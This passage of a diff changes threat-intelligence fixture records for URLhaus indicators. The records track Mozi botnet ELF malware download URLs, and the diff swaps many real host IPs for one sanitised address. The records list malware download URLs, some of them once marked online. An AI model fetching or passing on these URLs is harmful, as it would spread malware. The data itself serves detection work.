- "original": "{\"id\":\"961140\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961140/\",\"url\":\"http://61.54.41.216:34334/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.54.41.216\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027521Z",
+ "original": "{\"id\":\"961140\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961140/\",\"url\":\"http://89.160.20.156:34334/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19972,18 +19972,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.104.202:42886/Mozi.m",
+ "original": "http://89.160.20.156:42886/Mozi.m",
 "scheme": "http",
 "port": 42886,
- "domain": "186.33.104.202",
- "full": "http://186.33.104.202:42886/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:42886/Mozi.m"
 },
- "ip": "186.33.104.202"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694013451Z",
- "original": "{\"id\":\"961135\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961135/\",\"url\":\"http://186.33.104.202:42886/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.202\",\"date_added\":\"2021-01-14 17:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027528Z",
+ "original": "{\"id\":\"961135\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961135/\",\"url\":\"http://89.160.20.156:42886/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -20021,18 +20021,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://189.51.107.141:47096/Mozi.m",
+ "original": "http://89.160.20.156:47096/Mozi.m",
 "scheme": "http",
 "port": 47096,
- "domain": "189.51.107.141",
- "full": "http://189.51.107.141:47096/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47096/Mozi.m"
 },
- "ip": "189.51.107.141"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694016928Z",
- "original": "{\"id\":\"961134\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961134/\",\"url\":\"http://189.51.107.141:47096/Mozi.m\",\"url_status\":\"offline\",\"host\":\"189.51.107.141\",\"date_added\":\"2021-01-14 17:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027535Z",
+ "original": "{\"id\":\"961134\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961134/\",\"url\":\"http://89.160.20.156:47096/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -20070,18 +20070,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://182.126.81.19:48214/Mozi.a",
+ "original": "http://89.160.20.156:48214/Mozi.a",
 "scheme": "http",
 "port": 48214,
- "domain": "182.126.81.19",
- "full": "http://182.126.81.19:48214/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48214/Mozi.a"
 },
- "ip": "182.126.81.19"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694020024Z",
- "original": "{\"id\":\"961132\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961132/\",\"url\":\"http://182.126.81.19:48214/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.126.81.19\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027541800Z",
+ "original": "{\"id\":\"961132\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961132/\",\"url\":\"http://89.160.20.156:48214/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -20119,18 +20119,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://186.33.122.192:40478/Mozi.m",
+ "original": "http://89.160.20.156:40478/Mozi.m",
  "scheme": "http",
  "port": 40478,
- "domain": "186.33.122.192",
- "full": "http://186.33.122.192:40478/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40478/Mozi.m"
  },
- "ip": "186.33.122.192"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694023180Z",
- "original": "{\"id\":\"961133\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961133/\",\"url\":\"http://186.33.122.192:40478/Mozi.m\",\"url_status\":\"offline\",\"host\":\"186.33.122.192\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027548700Z",
+ "original": "{\"id\":\"961133\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961133/\",\"url\":\"http://89.160.20.156:40478/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20168,18 +20168,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://182.121.200.78:37771/Mozi.m",
+ "original": "http://89.160.20.156:37771/Mozi.m",
  "scheme": "http",
  "port": 37771,
- "domain": "182.121.200.78",
- "full": "http://182.121.200.78:37771/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37771/Mozi.m"
  },
- "ip": "182.121.200.78"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694026486Z",
- "original": "{\"id\":\"961130\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961130/\",\"url\":\"http://182.121.200.78:37771/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.200.78\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027555600Z",
+ "original": "{\"id\":\"961130\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961130/\",\"url\":\"http://89.160.20.156:37771/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20217,18 +20217,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://182.124.24.207:35513/Mozi.m",
+ "original": "http://89.160.20.156:35513/Mozi.m",
  "scheme": "http",
  "port": 35513,
- "domain": "182.124.24.207",
- "full": "http://182.124.24.207:35513/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35513/Mozi.m"
  },
- "ip": "182.124.24.207"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694029812Z",
- "original": "{\"id\":\"961131\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961131/\",\"url\":\"http://182.124.24.207:35513/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.124.24.207\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027562700Z",
+ "original": "{\"id\":\"961131\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961131/\",\"url\":\"http://89.160.20.156:35513/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20266,18 +20266,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://125.43.32.14:53382/Mozi.m",
+ "original": "http://89.160.20.156:53382/Mozi.m",
  "scheme": "http",
  "port": 53382,
- "domain": "125.43.32.14",
- "full": "http://125.43.32.14:53382/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53382/Mozi.m"
  },
- "ip": "125.43.32.14"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694033018Z",
- "original": "{\"id\":\"961129\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961129/\",\"url\":\"http://125.43.32.14:53382/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.32.14\",\"date_added\":\"2021-01-14 17:51:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027569600Z",
+ "original": "{\"id\":\"961129\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961129/\",\"url\":\"http://89.160.20.156:53382/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20315,18 +20315,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://115.55.129.18:50336/Mozi.m",
+ "original": "http://89.160.20.156:50336/Mozi.m",
  "scheme": "http",
  "port": 50336,
- "domain": "115.55.129.18",
- "full": "http://115.55.129.18:50336/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50336/Mozi.m"
  },
- "ip": "115.55.129.18"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694036294Z",
- "original": "{\"id\":\"961128\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961128/\",\"url\":\"http://115.55.129.18:50336/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.129.18\",\"date_added\":\"2021-01-14 17:50:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027576400Z",
+ "original": "{\"id\":\"961128\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961128/\",\"url\":\"http://89.160.20.156:50336/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20364,18 +20364,18 @@
  "url": {
  "path": "/Mozi.a",
  "extension": "a",
- "original": "http://116.73.59.171:34233/Mozi.a",
+ "original": "http://89.160.20.156:34233/Mozi.a",
  "scheme": "http",
  "port": 34233,
- "domain": "116.73.59.171",
- "full": "http://116.73.59.171:34233/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34233/Mozi.a"
  },
- "ip": "116.73.59.171"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694039701Z",
- "original": "{\"id\":\"961124\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961124/\",\"url\":\"http://116.73.59.171:34233/Mozi.a\",\"url_status\":\"offline\",\"host\":\"116.73.59.171\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027583300Z",
+ "original": "{\"id\":\"961124\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961124/\",\"url\":\"http://89.160.20.156:34233/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20413,18 +20413,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://117.208.132.85:38392/Mozi.m",
+ "original": "http://89.160.20.156:38392/Mozi.m",
  "scheme": "http",
  "port": 38392,
- "domain": "117.208.132.85",
- "full": "http://117.208.132.85:38392/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38392/Mozi.m"
  },
- "ip": "117.208.132.85"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694042917Z",
- "original": "{\"id\":\"961125\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961125/\",\"url\":\"http://117.208.132.85:38392/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.208.132.85\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027590200Z",
+ "original": "{\"id\":\"961125\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961125/\",\"url\":\"http://89.160.20.156:38392/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20462,18 +20462,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://117.222.173.218:52654/Mozi.m",
+ "original": "http://89.160.20.156:52654/Mozi.m",
  "scheme": "http",
  "port": 52654,
- "domain": "117.222.173.218",
- "full": "http://117.222.173.218:52654/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52654/Mozi.m"
  },
- "ip": "117.222.173.218"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694046072Z",
- "original": "{\"id\":\"961126\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961126/\",\"url\":\"http://117.222.173.218:52654/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.173.218\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027597200Z",
+ "original": "{\"id\":\"961126\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961126/\",\"url\":\"http://89.160.20.156:52654/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20511,18 +20511,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://117.247.200.9:60203/Mozi.m",
+ "original": "http://89.160.20.156:60203/Mozi.m",
  "scheme": "http",
  "port": 60203,
- "domain": "117.247.200.9",
- "full": "http://117.247.200.9:60203/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60203/Mozi.m"
  },
- "ip": "117.247.200.9"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694049309Z",
- "original": "{\"id\":\"961127\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961127/\",\"url\":\"http://117.247.200.9:60203/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.200.9\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027604200Z",
+ "original": "{\"id\":\"961127\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961127/\",\"url\":\"http://89.160.20.156:60203/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20560,18 +20560,18 @@
  "url": {
  "path": "/Mozi.a",
  "extension": "a",
- "original": "http://120.85.187.191:48091/Mozi.a",
+ "original": "http://89.160.20.156:48091/Mozi.a",
  "scheme": "http",
  "port": 48091,
- "domain": "120.85.187.191",
- "full": "http://120.85.187.191:48091/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48091/Mozi.a"
  },
- "ip": "120.85.187.191"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694063415Z",
- "original": "{\"id\":\"961123\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961123/\",\"url\":\"http://120.85.187.191:48091/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.187.191\",\"date_added\":\"2021-01-14 17:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027611200Z",
+ "original": "{\"id\":\"961123\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961123/\",\"url\":\"http://89.160.20.156:48091/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20609,18 +20609,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://111.241.105.88:40783/Mozi.m",
+ "original": "http://89.160.20.156:40783/Mozi.m",
  "scheme": "http",
  "port": 40783,
- "domain": "111.241.105.88",
- "full": "http://111.241.105.88:40783/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40783/Mozi.m"
  },
- "ip": "111.241.105.88"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694069647Z",
- "original": "{\"id\":\"961122\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961122/\",\"url\":\"http://111.241.105.88:40783/Mozi.m\",\"url_status\":\"offline\",\"host\":\"111.241.105.88\",\"date_added\":\"2021-01-14 17:49:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027618Z",
+ "original": "{\"id\":\"961122\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961122/\",\"url\":\"http://89.160.20.156:40783/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20658,18 +20658,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://113.88.36.206:52015/Mozi.m",
+ "original": "http://89.160.20.156:52015/Mozi.m",
  "scheme": "http",
  "port": 52015,
- "domain": "113.88.36.206",
- "full": "http://113.88.36.206:52015/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52015/Mozi.m"
  },
- "ip": "113.88.36.206"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694096547Z",
- "original": "{\"id\":\"961121\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961121/\",\"url\":\"http://113.88.36.206:52015/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.88.36.206\",\"date_added\":\"2021-01-14 17:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027625300Z",
+ "original": "{\"id\":\"961121\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961121/\",\"url\":\"http://89.160.20.156:52015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20707,18 +20707,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://59.99.143.251:42987/Mozi.m",
+ "original": "http://89.160.20.156:42987/Mozi.m",
  "scheme": "http",
  "port": 42987,
- "domain": "59.99.143.251",
- "full": "http://59.99.143.251:42987/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:42987/Mozi.m"
  },
- "ip": "59.99.143.251"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694106326Z",
- "original": "{\"id\":\"961118\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961118/\",\"url\":\"http://59.99.143.251:42987/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.143.251\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027632200Z",
+ "original": "{\"id\":\"961118\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961118/\",\"url\":\"http://89.160.20.156:42987/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20756,18 +20756,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://59.94.180.106:53388/Mozi.m",
+ "original": "http://89.160.20.156:53388/Mozi.m",
  "scheme": "http",
  "port": 53388,
- "domain": "59.94.180.106",
- "full": "http://59.94.180.106:53388/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53388/Mozi.m"
  },
- "ip": "59.94.180.106"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694110984Z",
- "original": "{\"id\":\"961119\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961119/\",\"url\":\"http://59.94.180.106:53388/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.94.180.106\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027639300Z",
+ "original": "{\"id\":\"961119\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961119/\",\"url\":\"http://89.160.20.156:53388/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20805,18 +20805,18 @@
  "url": {
  "path": "/Mozi.a",
  "extension": "a",
- "original": "http://36.224.231.40:44124/Mozi.a",
+ "original": "http://89.160.20.156:44124/Mozi.a",
  "scheme": "http",
  "port": 44124,
- "domain": "36.224.231.40",
- "full": "http://36.224.231.40:44124/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:44124/Mozi.a"
  },
